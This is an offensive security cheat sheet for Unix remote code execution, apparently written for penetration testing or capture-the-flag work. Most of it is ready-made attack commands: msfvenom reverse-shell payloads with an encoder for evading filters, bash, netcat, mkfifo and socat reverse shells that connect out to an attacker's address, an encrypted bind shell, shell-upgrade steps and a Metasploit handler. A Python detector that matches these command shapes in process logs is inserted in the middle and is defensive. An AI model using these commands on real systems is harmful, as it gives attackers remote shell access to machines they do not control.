
Unix Remote Code Execution

msfvenom

Shell File

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Java Code

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Shell Code

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "<badchars>"

Encoders

msfvenom --list encoders

Bash Reverse Shell

Don't forget to try the other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

/bin/sh -c 'sh -i >& /dev/tcp/myip/443 0>&1'
/bin/sh -c '0<&60-;exec 60<>/dev/tcp/myip/443;sh <&60 >&60 2>&60'

Netcat Reverse Shell

Kali machine

sudo nc -nlvp 443

Unix machine

nc -nv 192.168.11.130 443 -e /bin/sh

Netcat OpenBSD

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc myip 443 >/tmp/f

Netcat BusyBox

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc myip 443 >/tmp/f

Socat Reverse Shell

Kali machine

socat -d -d TCP4-LISTEN:443 STDOUT

Unix machine

socat TCP4:192.168.11.130:443 EXEC:/bin/sh

Socat Encrypted Bind Shell

Create credential

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 999 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Unix machine

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/sh

Kali machine

sudo socat OPENSSL:192.168.11.130:443,verify=0

Nmap NSE Scripts Exploit

cd /usr/share/nmap/scripts
grep Exploits *.nse
nmap --script-help=clamav-exec.nse

Upgrade shell

/usr/bin/python -c "import pty; pty.spawn('/bin/bash')"
export TERM=xterm

^Z

stty raw -echo; fg
stty -a
stty rows 41 columns 172
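
Each command shape listed above leaves a recognisable process command line, so process-creation logs are a practical place to detect them. The following is an added example, not part of the original page: a small matcher run over constructed log lines. The log layout, the rule names and the sample events are assumptions made for illustration.

```python
import re

# Heuristics keyed to the command shapes listed on this page; tune before production use.
RULES = [
    ("dev_tcp_redirect", re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")),
    ("nc_exec_shell", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[A-Za-z]*e\s+\S*sh\b")),
    ("fifo_shell_to_nc",
     re.compile(r"\b(?:mkfifo|mknod)\b.*\|\s*\S*sh\b.*\|\s*(?:nc|ncat|netcat)\b")),
    ("socat_exec_shell", re.compile(r"\bsocat\b.*\bEXEC:\S*sh\b", re.IGNORECASE)),
    ("pty_spawn_upgrade", re.compile(r"\bpty\.spawn\(")),
]

# Assumed log layout (hypothetical): "<timestamp> user=<name> pid=<n> cmd=<command line>"
LINE_RE = re.compile(r"^(\S+) user=(\S+) pid=(\d+) cmd=(.*)$")

# Constructed sample events; addresses come from the 192.0.2.0/24 documentation range.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z user=www-data pid=4312 cmd=/bin/sh -c 'sh -i >& /dev/tcp/192.0.2.10/443 0>&1'
2024-05-01T10:00:05Z user=www-data pid=4320 cmd=nc -nv 192.0.2.10 443 -e /bin/sh
2024-05-01T10:00:09Z user=tomcat pid=4388 cmd=sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 443 >/tmp/f
2024-05-01T10:00:12Z user=www-data pid=4401 cmd=socat TCP4:192.0.2.10:443 EXEC:/bin/sh
2024-05-01T10:00:15Z user=www-data pid=4410 cmd=/usr/bin/python -c "import pty; pty.spawn('/bin/bash')"
2024-05-01T10:01:00Z user=alice pid=5001 cmd=nc -zv 192.0.2.20 22
2024-05-01T10:01:05Z user=backup pid=5002 cmd=rsync -a -e ssh /srv/data backup@192.0.2.30:/srv/
2024-05-01T10:01:09Z user=alice pid=5003 cmd=socat -d -d TCP4-LISTEN:8080 STDOUT
"""


def scan(log_text):
    """Return one finding per log line that matches at least one rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed layout
        ts, user, pid, cmd = m.groups()
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings.append({"time": ts, "user": user, "pid": int(pid), "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["user"], f["pid"], ",".join(f["rules"]))
```

The three benign lines (a port check, rsync over ssh, a plain socat listener) are included to show that the rules key on the shell hand-off rather than on the tool name alone.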

msfconsole multi handler

sudo msfconsole -x "use exploit/multi/handler; set RHOST ip; set PAYLOAD windows/shell_reverse_tcp; set LHOST tun0; exploit"
processing AutoRunScript 'post/windows/manage/migrate'

PayloadsAllTheThings

Exploit Resources

SearchSploit

Metasploit Framework

BeEF